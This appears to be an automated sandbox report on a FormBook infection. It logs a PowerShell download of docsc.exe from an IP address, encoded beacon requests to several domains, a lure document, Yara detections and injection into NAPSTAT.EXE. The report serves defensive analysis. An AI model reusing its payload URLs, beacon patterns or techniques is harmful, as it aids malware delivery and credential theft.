Source: global traffic HTTP traffic detected: GET /goose/docsc.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 157.55.173.72Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /goose/docsc.exe HTTP/1.1Host: 157.55.173.72Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /a8si/?yxl4A=IJB8SptPOV&bzrD=4F1bkU/FiIiIeThn0vTtPD5XJl4c4IZLVeanHLI3MyhQ3xDAQVTSUto06Vs10btJG4UKsg== HTTP/1.1Host: www.boostcoachingonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /a8si/?bzrD=AKlWb4F2uLtjtixCEtxovY3lKx8NV8ATEUdUvfUwC6/Iyc/MbMvmSS41f7GTUiSOdXxAeQ==&yxl4A=IJB8SptPOV HTTP/1.1Host: www.thepocket-onlinelesson.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /a8si/?bzrD=UJpr1KJ3cAfqwplpJdbkHVupvAtN4HJ9rDw4p7p43guJdlFHza1zzh6114vkMzwZ//7Ijg==&yxl4A=IJB8SptPOV HTTP/1.1Host: www.applewholesales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /a8si/?yxl4A=IJB8SptPOV&bzrD=gy017r9A0psIMOBT0kV1AOcU5MENAfyqIllJOlDTSwkHuwjyB7K4Ynwu+ZK1UfHNgI+yKg== HTTP/1.1Host: www.southernbrushworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /a8si/?bzrD=tsBWpGsRZmy7d7x2nhlySyt7kUJXdizctJsfNrtXFEv4lF0eOqcyqbf0nJIyY4rkKVxBEQ==&yxl4A=IJB8SptPOV HTTP/1.1Host: www.betsysellsswfl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /a8si/?yxl4A=IJB8SptPOV&bzrD=SdeqJz6wjaIyYsu9X1DHbU17V+TmiEx/wZfEfcHGPKPVmfA4v4050PCPps/OkVYskoJ4SA== HTTP/1.1Host: www.ethereumdailypay.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /a8si/?bzrD=k28hoff2RzuOUW33PbGIPtKRPUr4n64pf9qOap2xi7OmRFd8c0vHG7pxTFlCjwyFI3/RUg==&yxl4A=IJB8SptPOV HTTP/1.1Host: www.foreverjsdesigns.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /a8si/?yxl4A=IJB8SptPOV&bzrD=O3o1U+q5oLWwAo4csM4kzZFzuvGZx18F2JtzSgoGolufYTqxaY4hRtZqS8lk7vb9Od8wBg== HTTP/1.1Host: www.4520oceanviewavenue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.boostcoachingonline.com
Source: powershell.exe, 00000006.00000002.2107002569.0000000003663000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmp String found in binary or memory: httP://157.55.
Source: powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2107002569.0000000003663000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmp String found in binary or memory: httP://157.55.17
Source: powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmp String found in binary or memory: httP://157.55.173.72/go
Source: powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmp String found in binary or memory: httP://157.55.173.72/goose/do
Source: powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2107002569.0000000003663000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmp String found in binary or memory: httP://157.55.173.72/goose/docsc
Source: powershell.exe, 00000008.00000002.2096198856.0000000000340000.00000004.00000020.sdmp String found in binary or memory: httP://157.55.173.72/goose/docsc.exe
Source: powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2107002569.0000000003663000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmp String found in binary or memory: httP://157.55.173.72/goose/docsc.exePE1
Source: powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp String found in binary or memory: http://157.55.173.72
Source: powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.2113476855.000000001BA55000.00000004.00000001.sdmp String found in binary or memory: http://157.55.173.72/goose/docsc.exe
Source: powershell.exe, 00000003.00000002.2100780380.0000000002340000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2096222318.0000000002270000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2097117597.0000000002400000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000003.00000002.2100780380.0000000002340000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2096222318.0000000002270000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2097117597.0000000002400000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000003.00000002.2097620133.000000000034E000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2095022345.000000000024E000.00000004.00000020.sdmp, powershell.exe, 00000008.00000002.2096210850.000000000037E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000008.00000002.2096210850.000000000037E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://KK
Source: powershell.exe, 00000003.00000002.2097620133.000000000034E000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2095022345.000000000024E000.00000004.00000020.sdmp, powershell.exe, 00000008.00000002.2096210850.000000000037E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing when opening. 0 Page: I of 2 Words: 539 N@m 13 ;a 10096 G) FI G) ,, =1'L'm')
Source: Screenshot number: 8 Screenshot OCR: Enable Editing when opening. O "g"' 0' ' I Wo"" "' I '3 I _ 1@ 13 '00% G) A GE) a 0 m
Source: Screenshot number: 12 Screenshot OCR: Enable Editing when opening. ii: ^ . . . . . 's . . . . .layer . . . . . . a"t , au'qj . . . ,.
Found suspicious RTF objects
Source: AbctfhgXgdghgh.ScT Static RTF information: Object: 0 Offset: 00007110h AbctfhgXgdghgh.ScT
Microsoft Office creates scripting files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\Abctfhghgdghgh .ScT Jump to behavior
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\docsc[1].exe Jump to dropped file
PE file contains section with special chars
Source: docsc[1].exe.0.dr Static PE information: section name: U#j;F_`
Source: docsc.exe.3.dr Static PE information: section name: U#j;F_`
PE file has nameless sections
Source: docsc[1].exe.0.dr Static PE information: section name:
Source: docsc.exe.3.dr Static PE information: section name:
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\docsc.exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\docsc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_004181C0 NtCreateFile, 12_2_004181C0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00418270 NtReadFile, 12_2_00418270
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_004182F0 NtClose, 12_2_004182F0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_004183A0 NtAllocateVirtualMemory, 12_2_004183A0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041826A NtReadFile, 12_2_0041826A
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041839A NtAllocateVirtualMemory, 12_2_0041839A
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00730078 NtResumeThread,LdrInitializeThunk, 12_2_00730078
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00730048 NtProtectVirtualMemory,LdrInitializeThunk, 12_2_00730048
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007300C4 NtCreateFile,LdrInitializeThunk, 12_2_007300C4
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007307AC NtCreateMutant,LdrInitializeThunk, 12_2_007307AC
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072F900 NtReadFile,LdrInitializeThunk, 12_2_0072F900
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072F9F0 NtClose,LdrInitializeThunk, 12_2_0072F9F0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FAE8 NtQueryInformationProcess,LdrInitializeThunk, 12_2_0072FAE8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 12_2_0072FAD0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FB68 NtFreeVirtualMemory,LdrInitializeThunk, 12_2_0072FB68
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FBB8 NtQueryInformationToken,LdrInitializeThunk, 12_2_0072FBB8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FC60 NtMapViewOfSection,LdrInitializeThunk, 12_2_0072FC60
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FC90 NtUnmapViewOfSection,LdrInitializeThunk, 12_2_0072FC90
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FDC0 NtQuerySystemInformation,LdrInitializeThunk, 12_2_0072FDC0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FD8C NtDelayExecution,LdrInitializeThunk, 12_2_0072FD8C
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 12_2_0072FED0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FEA0 NtReadVirtualMemory,LdrInitializeThunk, 12_2_0072FEA0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FFB4 NtCreateSection,LdrInitializeThunk, 12_2_0072FFB4
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00730060 NtQuerySection, 12_2_00730060
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007310D0 NtOpenProcessToken, 12_2_007310D0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00731148 NtOpenThread, 12_2_00731148
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0073010C NtOpenDirectoryObject, 12_2_0073010C
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007301D4 NtSetValueKey, 12_2_007301D4
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072F8CC NtWaitForSingleObject, 12_2_0072F8CC
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00731930 NtSetContextThread, 12_2_00731930
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072F938 NtWriteFile, 12_2_0072F938
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FA50 NtEnumerateValueKey, 12_2_0072FA50
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FA20 NtQueryInformationFile, 12_2_0072FA20
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FAB8 NtQueryValueKey, 12_2_0072FAB8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FB50 NtCreateKey, 12_2_0072FB50
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FBE8 NtQueryVirtualMemory, 12_2_0072FBE8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00730C40 NtGetContextThread, 12_2_00730C40
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FC48 NtSetInformationFile, 12_2_0072FC48
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FC30 NtOpenProcess, 12_2_0072FC30
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FD5C NtEnumerateKey, 12_2_0072FD5C
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00731D80 NtSuspendThread, 12_2_00731D80
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FE24 NtWriteVirtualMemory, 12_2_0072FE24
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FF34 NtQueueApcThread, 12_2_0072FF34
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FFFC NtCreateProcessEx, 12_2_0072FFFC
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_002767C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, 12_2_002767C7
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_002767C2 NtQueryInformationProcess, 12_2_002767C2
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020A00C4 NtCreateFile,LdrInitializeThunk, 14_2_020A00C4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020A07AC NtCreateMutant,LdrInitializeThunk, 14_2_020A07AC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FAB8 NtQueryValueKey,LdrInitializeThunk, 14_2_0209FAB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 14_2_0209FAD0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FAE8 NtQueryInformationProcess,LdrInitializeThunk, 14_2_0209FAE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FB50 NtCreateKey,LdrInitializeThunk, 14_2_0209FB50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FB68 NtFreeVirtualMemory,LdrInitializeThunk, 14_2_0209FB68
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FBB8 NtQueryInformationToken,LdrInitializeThunk, 14_2_0209FBB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209F900 NtReadFile,LdrInitializeThunk, 14_2_0209F900
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209F9F0 NtClose,LdrInitializeThunk, 14_2_0209F9F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 14_2_0209FED0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FFB4 NtCreateSection,LdrInitializeThunk, 14_2_0209FFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FC60 NtMapViewOfSection,LdrInitializeThunk, 14_2_0209FC60
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FD8C NtDelayExecution,LdrInitializeThunk, 14_2_0209FD8C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FDC0 NtQuerySystemInformation,LdrInitializeThunk, 14_2_0209FDC0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020A0048 NtProtectVirtualMemory, 14_2_020A0048
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020A0060 NtQuerySection, 14_2_020A0060
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020A0078 NtResumeThread, 14_2_020A0078
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020A10D0 NtOpenProcessToken, 14_2_020A10D0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020A010C NtOpenDirectoryObject, 14_2_020A010C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020A1148 NtOpenThread, 14_2_020A1148
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020A01D4 NtSetValueKey, 14_2_020A01D4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FA20 NtQueryInformationFile, 14_2_0209FA20
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FA50 NtEnumerateValueKey, 14_2_0209FA50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FBE8 NtQueryVirtualMemory, 14_2_0209FBE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209F8CC NtWaitForSingleObject, 14_2_0209F8CC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209F938 NtWriteFile, 14_2_0209F938
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020A1930 NtSetContextThread, 14_2_020A1930
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FE24 NtWriteVirtualMemory, 14_2_0209FE24
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FEA0 NtReadVirtualMemory, 14_2_0209FEA0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FF34 NtQueueApcThread, 14_2_0209FF34
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FFFC NtCreateProcessEx, 14_2_0209FFFC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FC30 NtOpenProcess, 14_2_0209FC30
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FC48 NtSetInformationFile, 14_2_0209FC48
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020A0C40 NtGetContextThread, 14_2_020A0C40
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FC90 NtUnmapViewOfSection, 14_2_0209FC90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FD5C NtEnumerateKey, 14_2_0209FD5C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020A1D80 NtSuspendThread, 14_2_020A1D80
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_000981C0 NtCreateFile, 14_2_000981C0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_00098270 NtReadFile, 14_2_00098270
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_000982F0 NtClose, 14_2_000982F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_000983A0 NtAllocateVirtualMemory, 14_2_000983A0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0009826A NtReadFile, 14_2_0009826A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0009839A NtAllocateVirtualMemory, 14_2_0009839A
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D2450 10_2_001D2450
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D6C78 10_2_001D6C78
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D1881 10_2_001D1881
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D2CCA 10_2_001D2CCA
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D04E2 10_2_001D04E2
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D4590 10_2_001D4590
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001DC1B0 10_2_001DC1B0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001DB1A8 10_2_001DB1A8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D36B0 10_2_001D36B0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D5410 10_2_001D5410
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D6830 10_2_001D6830
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D6821 10_2_001D6821
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D5420 10_2_001D5420
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D4466 10_2_001D4466
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D44A0 10_2_001D44A0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001DA1B0 10_2_001DA1B0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D5210 10_2_001D5210
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D6610 10_2_001D6610
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D6601 10_2_001D6601
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001DD268 10_2_001DD268
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001DCE68 10_2_001DCE68
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D6A98 10_2_001D6A98
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D6AA8 10_2_001D6AA8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D76DA 10_2_001D76DA
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D5FA0 10_2_001D5FA0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00431170 10_2_00431170
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00431B58 10_2_00431B58
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_004344C8 10_2_004344C8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00436550 10_2_00436550
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00434D21 10_2_00434D21
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_004316B8 10_2_004316B8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00430740 10_2_00430740
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00435740 10_2_00435740
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00430048 10_2_00430048
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_004388C8 10_2_004388C8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_004338A8 10_2_004338A8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_004372A0 10_2_004372A0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00431B48 10_2_00431B48
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00438B58 10_2_00438B58
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_0043DC28 10_2_0043DC28
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_0043EC28 10_2_0043EC28
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00438CF8 10_2_00438CF8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00431491 10_2_00431491
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00437498 10_2_00437498
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_004314A0 10_2_004314A0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_004386A8 10_2_004386A8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_004316A8 10_2_004316A8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00430730 10_2_00430730
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_0043D780 10_2_0043D780
